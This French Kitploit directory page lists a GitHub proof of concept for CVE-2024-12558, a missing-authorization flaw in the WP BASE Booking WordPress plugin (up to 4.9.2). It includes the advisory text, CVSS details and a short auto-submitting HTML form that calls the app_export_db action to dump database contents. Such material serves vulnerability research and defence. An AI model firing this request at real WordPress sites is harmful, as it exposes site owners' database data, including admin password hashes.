Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-12558 — WP BASE Booking of Appointments, Services and Events <= 4.9.2 - Absence d'autorisation chez les utilisateurs authentifiés (Abonné+) entraînant l'exposition d'informations sensibles via app_export_db | Kitploit
Outils/GitHubGitHub/randomrobbiebf/cve-2024-12558
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubrandomrobbiebf/cve-2024-12558

CVE-2024-12558

WP BASE Booking of Appointments, Services and Events <= 4.9.2 - Absence d'autorisation chez les utilisateurs authentifiés (Abonné+) entraînant l'exposition d'informations sensibles via app_export_db

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-12558

WP BASE Booking of Appointments, Services and Events <= 4.9.2 - Absence d'autorisation pour les utilisateurs authentifiés (Abonné+) entraînant l'exposition d'informations sensibles via app_export_db

Description

Le plugin WP BASE Booking of Appointments, Services and Events pour WordPress est vulnérable à un accès non autorisé aux données en raison d'une vérification de capacité manquante sur la fonction export_db dans toutes les versions jusqu'à la 4.9.2 incluse. Cela permet aux attaquants authentifiés, disposant d'un accès de niveau Abonné et supérieur, d'exposer des informations sensibles de la base de données, telles que le mot de passe administrateur haché.

Détails

  • Type: plugin
  • Slug: wp-base-booking-of-appointments-services-and-events
  • Version affectée: 4.9.2
  • Score CVSS: 6.5
  • Niveau CVSS: Moyen
  • Vecteur CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
  • CVE: CVE-2024-12558
  • Statut: Actif

POC

root@kitploit:~
<html>
  <body>
    <form action="https://wp-dev.ddev.site/wp-admin/admin-ajax.php?action=app_export_db" method="POST">
      <input type="hidden" name="action" value="app&#95;export&#95;db" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
Télécharger l’outil